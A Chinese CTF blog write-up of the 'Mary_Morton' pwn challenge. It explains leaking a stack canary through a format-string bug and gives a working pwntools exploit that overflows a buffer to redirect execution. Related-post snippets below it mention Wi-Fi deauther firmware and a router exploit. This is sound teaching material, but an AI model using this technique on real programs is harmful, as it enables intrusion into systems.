PWN做题笔记11-Mary_Morton(格式化字符串暴露canary)

最新推荐文章于 2024-02-05 19:55:22 发布
最新推荐文章于 2024-02-05 19:55:22 发布
阅读量295 收藏 2
点赞数 3
文章标签: 笔记 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40923256/article/details/130686186
版权

这题是难度4,也是第一次见着针对开启canary保护的程序作溢出,收获还是挺大的~

0x1

首先checksec

 开启了栈保护(canary)、栈不可执行,没开启地址空间随机化

程序本身给了两部分,选择后都可以进行一次输入

0x2

 ida静态分析:

选1有缓冲区溢出漏洞(0x100>136)

 

选2有格式化字符串漏洞

目标函数在0x4008DA

 0x3

canary又称金丝雀,在栈中存放一个字节串,当发现这个字节串被修改时告知用户发现溢出并终止程序执行,效果例如:

该字符串具备如下特征:

  • 无特殊规定时位于栈的ebp上方一个单元格(0x1-0x8)
  • 以00结尾
  • 每次执行值不同

 因此需要先通过格式化字符串漏洞暴露该值并在溢出时将对应地址覆盖对应值规避检测

0x4

 显然,我们gets存放buf的地址与printf格式化字符串形参相对偏移为6

 buf与canary字符串距离为0x90-0x8=0x88,占2*8+1=17个内存单元

canary与printf格式化字符串形参相对偏移为6+17=23

试一下,00结尾,是他了

 0x5

代码如下

from pwn import*

context(os='linux', arch='amd64', log_level='debug')

#p=process('./fmof')
p=connect("61.147.171.105", 56969)

p.sendlineafter("battle \n","2")
p.sendline("%23$p")
tmp=int(p.recv(),16)
canary=p64(tmp)

payload=b"a"*(0x88)+canary+p64(0)+p64(0x4008DA)

p.sendlineafter("3.","1")

p.sendline(payload)
p.interactive()

写代码的时候:

1.发现加debug看输入输出还是很管用的

2.要用recv而不是recvline,否则换行符转不了16进制

3.不能直接用读到的字节流,因为0x也是字节,要转为16进制数再转为p64地址

0x6

运行成功

 

_alpaca_
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN基础9:使用 gdb 附加调试 64位程序
prettyX的博客
07-12 1211
场景描述 此节课,我们讨论的问场景如下:在PWN时,完成调试分析后,开始着手写Exp,在写Exp时一般不会一次写成功,此时我们需要调试分析问出在哪里。那么此时,我们可以在Exp中,设置一个暂停,随后,通过gdb附加调试我们的ELF分析对象,此时Exp发送Payload,在ELF程序接收到后,再分析Payload在程序的栈等数据结构中的部署情况,找出错误,完成最后的Exp。OK,上述就是我们今天研究问的大致场景 开始 这节课我们研究的源码如下 //L9.c #include <std
PWN——格式化字符串泄露canary
djhtdjdywgjc的博客
11-19 1226
格式化字符串泄露canary
栈上格式化字符串漏洞:泄露canary,修改got表,stack check fail,one_gadget
最新发布
2302_79813730的博客
02-05 526
此时就存在格式化字符串漏洞。%c为单个字符形式%s为多个字符形式%d为数字形式%f是转为浮点型%x是转为十六进制形式,不带0x%p是转为十六进制,但是带0x%n 将%n之前打印出来的字符的个数存入到参数中接下通过例来讲解利用方法。
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1281
目录标一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
[深育杯 2021]find_flag wp(绕过PIE和canary 格式化字符串 栈溢出 )
qq_73667990的博客
06-28 597
直接跳到格式化字符串漏洞处,然后查看栈结构,rbp上下分别是canary和返回地址。所以我们要输入0x40-0x8来把v2到canary填充完,然后再原封不动的输入canary,然后再输入0x8个a填充rbp指针,然后再输入后门函数地址覆盖返回地址。所以我们栈的第一个位置其实是rdi,所以canary和return的位置分别为17和19,我们输入。开了canary保护,栈溢出时,要还原canary,开了PIE,地址会改变。有了返回地址,我们减去偏移就能得到程序基地址,返回地址偏移为0x146F。
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2199
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
PWN-shellcode-WP- (一)目文件.rar
03-29
为几道搜集的真,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问
pwn1 格式化字符串泄露canary
qq_44832048的博客
07-27 867
前面在终端中查看保护机制和32位在前面提到过就不讲了, 只不过在这里只开启了Canary,所以我们可以用格式化字符串漏洞泄露出栈上保存的Canary,没有开启NX,说明堆栈可执行,我们可以在第二次输入中直接把shellcode布置到栈里面,然后返回到栈里 用ida简单看了一下,就是让你输入名字,然后调用get_message函数输出你的名字,让你留言,留言有溢出漏洞,显然用了printf,也有...
攻防世界pwn高手进阶(持续更新)
qq_42988973的博客
12-16 500
攻防世界pwn高手进阶wp
pwnnum17-----格式化字符串泄露canary+栈溢出
tbsqigongzi的博客
04-23 1097
攻防世界pwn进阶区Mary_Morton 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行后,选1是栈溢出,选2是格式化字符串溢出,选3是退出程序 ida一下主函数 简单的程序,三种选择,选1进入stack()函数 buf占0x90字节,read函数读入0x100字节,寻找
攻防世界 Pwn 进阶 第一页
yongbaoii的博客
10-19 2991
写在最前面 我在某天中午睡了一觉之后大彻大悟 我感觉pwn最重要的是能不能找得到漏洞点,学会怎么利用这个漏洞点以及明白他的原理倒是要往后放一放,所以要来一个漏洞总结,总结我现在见到过的所有漏洞、漏洞的原理以及它的表现形式,就在攻防世界第一页之后吧,以的形式去进行一些总结。 00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区。 攻防世界 Pwn 新手 1、栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc。 常见漏洞点有read()函数、gets()函数、strca
格式化字符串泄露canary到栈溢出
SsMing的博客
01-11 4270
以ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看,开了NX保护,还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...
格式化字符串漏洞泄露StackCanary
ACdream
04-26 3034
2017陕西省的pwn_box这个作为调试的程序,gdb作为工具 先来熟悉原理,推荐几个pdf学习懂原理吧: Format String Exploitation-Tutorial By Saif El-Sherei Exploiting Format String Vulnerabilities  scut/team teso 看完这几个会对原理有深刻认识,然后如何操作呢? 戳我
格式化字符串漏洞canary
qq_44813849的博客
07-26 428
用一道例进行讲解 pwn1 先使用checksec命令看一下用来检查可执行文件属性 然后用ida打开 在主函数看到gets()函数,说明这是一个字符串漏洞,因为gets()函数可以输入无限长的字符串,所以会有溢出。 然后使用ubuntu打开,进行调试 gdb调试: 输入start开始 寻找断点地址 进入栈 一直按回车直到到栈底 附上脚本 from pwn import * shellcod...
格式化字符串漏洞_格式化字符串绕过canary入门
weixin_39611340的博客
12-09 172
原创: EDI-VOID 合天智汇 知识格式化字符串漏洞是因为c语言中printf的参数个数不是确定的,参数的长度也不是确定的,当printf把我们的输入当作第一个参数直接输出的时候,我们输入若干格式化字符串,会增加与格式化字符串相对应的参数,会泄露出栈中的内容Canary的工作原理就是子函数在自己的事情之前,在自己的栈帧里返回地址之前插入一个随机的cookie,从gs:0x14的地方取出...
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值